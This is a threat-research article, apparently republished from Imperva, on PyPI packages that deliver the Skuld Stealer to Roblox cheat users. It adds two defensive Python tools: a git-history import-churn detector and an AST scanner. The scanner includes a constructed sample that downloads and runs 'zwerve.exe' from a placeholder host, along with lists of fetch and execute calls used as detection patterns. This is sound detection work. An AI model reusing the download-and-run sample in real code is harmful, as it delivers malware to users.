In recent research on compromised and malicious PyPI packages, Imperva Threat Research has identified an ongoing malware campaign specifically targeting Roblox hackers. In this blog, we shed light on this campaign and the evolving tactics cybercriminals use to target game hacking communities.

Malicious actors can use popular gaming platforms, forums, and communities to spread malware such as stealers, RATs, and cryptominers. One such example can be found in the game hacking community surrounding the popular video game Roblox. Roblox is a popular online gaming platform and creation system that allows users to play or create multiplayer games. One example of a game within the Roblox framework is Da Hood, which takes place in a gang subculture environment where players can choose to become a police officer or a criminal, participating in or combating gang activities.

Many gamers, including Roblox (and Da Hood) players, opt to install cheats ('externals'), hacks, and modifications ('mods') to enhance their gaming experience. Mods change the way a game looks or behaves, whereas cheats give the player an advantage during play, such as "aimlock", which improves aiming accuracy in shooter games. Over time, vast communities have assembled on platforms such as Reddit, YouTube, and Discord, allowing players to exchange tips and tools on mods and cheats for various game environments. Although some of these programs offer legitimate game boosts, malicious actors frequently leverage game hackers' interest in modifications to deliver malware. It is well documented that installing such cheats and mods can leave gamers exposed to malware infection. Game hackers are often encouraged to disable antivirus and real-time protection so that cheats can run, making them even more susceptible to infection, as we will see in our example later.

Eventually, we came across a GitHub repository named 'Zwerve-External' that was actively using the malicious 'pysleek' package. The repository is presented as an open-source cheat tool (external) designed to enhance the gaming experience for Da Hood players. Upon closer examination of the history of 'main.py' in the repository, we observed that the maintainer regularly updated the file to use various different malicious PyPI packages. At this stage, we wanted to investigate whether there were other malicious packages exhibiting the same behavior, and we discovered five more.

Upon investigation, we discovered that the package downloads a binary file called 'zwerve.exe'. When we examined the GitHub repository hosting this binary, we noticed that the maintainer had been repeatedly adding and removing the binary every few days. Adding and deleting 'zwerve.exe' from the repository could indicate an attempt to evade detection by static or automated analysis tools.

The Skuld Stealer is Windows malware written in Go, designed to extract sensitive data from Discord, browsers, and cryptocurrency wallets. It targets Discord users by capturing 2FA codes and intercepting login requests, extracts data from cryptocurrency wallets, and replaces clipboard content with attacker-controlled crypto addresses. Tools like these are often created for educational and research purposes, demonstrating how malicious tools can be used to steal secrets and gain remote access to systems. This duality highlights the challenge of balancing open research with the risk of empowering cybercriminals, as tools meant to improve security are often weaponized against unsuspecting users.
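The churn in 'main.py' described above (one malicious dependency swapped for another every few days) leaves a clear trace in git history. The following is an added example, not code from the Imperva post or from the Zwerve-External repository: it parses a `git log -p` dump for a single file and reports which third-party imports were introduced and later swapped out. The log embedded in the block is constructed for the demo, with placeholder commit hashes and package names (stage1_pkg and so on) rather than the real repository history or the real package names.

```python
"""Added example (not code from the Imperva post or the Zwerve-External
repository): replay a `git log -p` dump for one file and report third-party
imports that were introduced and later dropped, the churn pattern the post
describes in 'main.py'. SAMPLE_LOG is constructed; hashes and package names
are placeholders."""
import re

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})\b")
# '+'/'-' diff lines that add or remove an import (indented ones included).
IMPORT_RE = re.compile(
    r"^([+-])\s*(?:import\s+([\w., ]+)|from\s+([\w.]+)\s+import\b)")
# Interpreter modules that are never a PyPI dependency; extend as needed.
STDLIB = frozenset({"os", "sys", "json", "time", "subprocess", "urllib", "re"})


def _top_level_names(m):
    """Top-level module names from a matched import line."""
    if m.group(2):                                   # import a.b, c as d
        return {p.strip().split(" as ")[0].split(".")[0]
                for p in m.group(2).split(",") if p.strip()}
    return {m.group(3).split(".")[0]}               # from a.b import c


def parse_import_changes(log_text):
    """Return [(sha, added, removed), ...] newest first, as git prints it."""
    commits, sha, added, removed = [], None, set(), set()
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            if sha is not None:
                commits.append((sha, added, removed))
            sha, added, removed = m.group(1), set(), set()
            continue
        if line.startswith(("+++ ", "--- ")):       # file headers, not code
            continue
        m = IMPORT_RE.match(line)
        if m:
            names = _top_level_names(m) - STDLIB
            (added if m.group(1) == "+" else removed).update(names)
    if sha is not None:
        commits.append((sha, added, removed))
    return commits


def analyze_churn(log_text):
    """Replay history oldest-first. 'rotated' lists packages that were
    introduced and later dropped as (pkg, introduced_in, removed_in);
    'live' maps packages still imported to the commit that introduced them."""
    live, rotated = {}, []
    for sha, added, removed in reversed(parse_import_changes(log_text)):
        for pkg in sorted(removed):                  # removals first, so a
            if pkg in live:                          # swap in one commit is
                rotated.append((pkg, live.pop(pkg), sha))  # add + remove
        for pkg in sorted(added):
            live.setdefault(pkg, sha)
    return {"rotated": rotated, "live": live}


# Constructed log: three commits, each swapping the non-stdlib import.
SAMPLE_LOG = """\
commit c3c3c3c
Author: maintainer <maintainer@example.invalid>

    update

diff --git a/main.py b/main.py
--- a/main.py
+++ b/main.py
@@ -1,3 +1,3 @@
 import os
-import stage2_pkg
+import stage3_pkg
 import subprocess

commit c2c2c2c
Author: maintainer <maintainer@example.invalid>

    update

diff --git a/main.py b/main.py
--- a/main.py
+++ b/main.py
@@ -1,3 +1,3 @@
 import os
-from stage1_pkg import run
+import stage2_pkg
 import subprocess

commit c1c1c1c
Author: maintainer <maintainer@example.invalid>

    initial

diff --git a/main.py b/main.py
--- /dev/null
+++ b/main.py
@@ -0,0 +1,3 @@
+import os
+from stage1_pkg import run
+import subprocess
"""

if __name__ == "__main__":
    print(analyze_churn(SAMPLE_LOG))
```

Run it against real history with `git log -p --follow -- main.py > log.txt` and pass the file contents to `analyze_churn`; a script whose only non-stdlib import is replaced commit after commit, each new package living for a few days, is the signal worth chasing back to PyPI.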
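The package behaviour described above (fetch a Windows binary from a remote repository, write it to disk, run it) has a shape that can be spotted in source before anything is installed. The following is an added example, not code from the Imperva post, the Zwerve-External repository or the 'pysleek' package: a small AST scanner that resolves import aliases, then flags a module in which a network fetch, an execution primitive and a binary-looking file name all co-occur. The two sample modules in the block are constructed for the demo; the URL (on the reserved example.invalid domain) and paths are placeholders, and the "malicious" sample only mimics the shape the post describes.

```python
"""Added example (not code from the Imperva post, the Zwerve-External
repository or 'pysleek'): AST scan for the download-then-execute shape the
post attributes to the malicious package. SAMPLE_MALICIOUS and SAMPLE_BENIGN
are constructed; the URL and file paths are placeholders."""
import ast
import re

# Fetch and execute primitives, as the fully qualified names they resolve to
# after import aliasing. Extend to taste (httpx, ctypes.windll, ...).
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get", "requests.post"}
EXEC_CALLS = {"os.system", "os.startfile", "os.execv", "subprocess.run",
              "subprocess.Popen", "subprocess.call", "subprocess.check_output"}
BINARY_EXT = re.compile(r"\.(exe|dll|scr|bat|cmd|ps1)$", re.IGNORECASE)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def _alias_map(tree):
    """Map local binding names to the module path they import."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:                      # import subprocess as sp
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:                      # from os import startfile
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _resolve(name, aliases):
    """Rewrite the first component through the alias map (sp.run -> subprocess.run)."""
    head, _, rest = name.partition(".")
    base = aliases.get(head, head)
    return f"{base}.{rest}" if rest else base


def scan_source(src):
    """Collect fetch calls, exec calls, remote URLs and binary-looking strings
    from one module and decide whether the three co-occur."""
    tree = ast.parse(src)
    aliases = _alias_map(tree)
    found = {"fetch_calls": [], "exec_calls": [], "remote_urls": [],
             "binary_strings": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            name = _resolve(name, aliases)
            if name in FETCH_CALLS:
                found["fetch_calls"].append(name)
            elif name in EXEC_CALLS:
                found["exec_calls"].append(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if URL_RE.match(node.value):
                found["remote_urls"].append(node.value)
            if BINARY_EXT.search(node.value):
                found["binary_strings"].append(node.value)
    # Any one of these is common in benign code; all three together is the
    # download-then-run shape that deserves a human look.
    found["suspicious"] = bool(found["fetch_calls"] and found["exec_calls"]
                               and found["binary_strings"])
    return found


# Constructed sample mimicking the shape the post describes: fetch a binary
# named 'zwerve.exe' and run it. example.invalid never resolves.
SAMPLE_MALICIOUS = '''
import os
from urllib.request import urlretrieve
URL = "https://example.invalid/files/zwerve.exe"
dst = os.path.join(os.getenv("TEMP", "."), "zwerve.exe")
urlretrieve(URL, dst)
os.startfile(dst)
'''

# Constructed benign sample: fetches remote JSON, never writes or runs a binary.
SAMPLE_BENIGN = '''
import json
import urllib.request
with urllib.request.urlopen("https://example.invalid/version.json") as r:
    print(json.load(r)["version"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_source(src))
```

The co-occurrence rule is deliberately coarse: an installer that legitimately fetches and runs an .exe will trip it too, so it is a triage filter for packages pulled from an untrusted cheat repository, not a verdict. Obfuscated packages (base64 strings, `exec` of decoded text) will not show the URL or the binary name in the AST and need a second pass after decoding.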
This Cyber News was published on www.imperva.com. Publication date: Tue, 01 Oct 2024 00:43:05 +0000